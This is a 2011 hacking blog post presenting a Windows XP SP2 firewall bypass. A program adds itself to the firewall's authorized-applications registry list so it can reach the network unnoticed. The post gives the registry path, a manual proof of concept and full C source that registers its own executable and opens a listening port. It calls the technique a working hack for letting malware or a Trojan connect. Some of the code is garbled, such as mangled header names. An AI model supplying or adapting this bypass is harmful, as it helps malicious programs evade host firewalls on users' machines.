Friday, June 3, 2011

How to Bypass Windows XP Firewall using C program

How to bypass Windows XP firewall using C
Bypass Windows XP Firewall
Hello Friends, today i will share with you the technique using which we can bypass windows-xp service pack-2 firewall. Its a 100% working hack and its basically an exploit in windows XP.

This techniques is nothing but the vulnerability found in windows-xp sp2 firewall.





Windows XP Firewall Bypassing (Registry Based) :- Microsoft Windows XP SP2 comes bundled with a Firewall. Direct access to Firewall's registry keys allow local attackers to bypass the Firewall blocking list and allow malicious program to connect the network.




Credit
:-

The information has been provided by Mark Kica.





Vulnerable Systems :-

* Microsoft Windows XP SP2
Windows XP SP2 Firewall has list of allowed program in registry which are not properly protected from modification by a malicious local attacker.If an attacker adds a new key to the registry address of  
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\ SharedAccess\Parameters\FirewallPolicy\StandardProfile\ AuthorizedApplications\List
 the attacker can enable his malware or Trojan to connect to the Internet without the Firewall triggering a warning.



Proof of Concept :-

Launch the regedit.exe program and access the keys found under the following path:

HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\ SharedAccess\Parameters\FirewallPolicy\StandardProfile\ AuthorizedApplications\List


Add an entry key such as this one:

Name: C:\chat.exe

Value: C:\chat.exe:*:Enabled:chat


Source Code :-




#include <*stdio.h*>

#include <*windows.h*>

#include <*ezsocket.h*>

#include <*conio.h*>


#include "Shlwapi.h"

int main( int argc, char *argv [] )

{

char buffer[1024];

char filename[1024];


HKEY hKey;

int i;


GetModuleFileName(NULL, filename, 1024);


strcpy(buffer, filename);

strcat(buffer, ":*:Enabled:");

strcat(buffer, "bugg");


RegOpenKeyEx(

HKEY_LOCAL_MACHINE,

"SYSTEM\\CurrentControlSet\\Services" "\\SharedAccess\\Parameters\\FirewallPolicy\\StandardProfile" "\\AuthorizedApplications\\List",

0,


KEY_ALL_ACCESS,

&hKey);


RegSetValueEx(hKey, filename, 0, REG_SZ, buffer, strlen(buffer));



int temp, sockfd, new_fd, fd_size;


struct sockaddr_in remote_addr;


fprintf(stdout, "Simple server example with Anti SP2 firewall trick \n");

fprintf(stdout, " This is not trojan \n");


fprintf(stdout, " Opened port is :2001 \n");

fprintf(stdout, "author:Mark Kica student of Technical University Kosice\n");

fprintf(stdout, "Dedicated to Katka H. from Levoca \n");


sleep(3);

if ((sockfd = ezsocket(NULL, NULL, 2001, SERVER)) == -1)

return 0;


for (; ; )


{

RegDeleteValue(hKey, filename);

fd_size = sizeof(struct sockaddr_in);


if ((new_fd = accept(sockfd, (struct sockaddr *)&remote_addr, &fd_size)) == -1)

{

perror("accept");

continue;


}

temp = send(new_fd, "Hello World\r\n", strlen("Hello World\r\n"), 0);

fprintf(stdout, "Sended: Hello World\r\n");

temp = recv(new_fd, buffer, 1024, 0);

buffer[temp] = '\0';

fprintf(stdout, "Recieved: %s\r\n", buffer);

ezclose_socket(new_fd);

RegSetValueEx(hKey, filename, 0, REG_SZ, buffer, strlen(buffer));


if (!strcmp(buffer, "quit"))


break;

}


ezsocket_exit();

return 0;

}


/* EoF */
Remove ** from the header files... easier to understand...Here we are just manipulating registry values using this program...

I hope you all liked It... If you have any queries ask me in form of comment...

0 comments:

Updates Via E-Mail

Blog Archive

Labels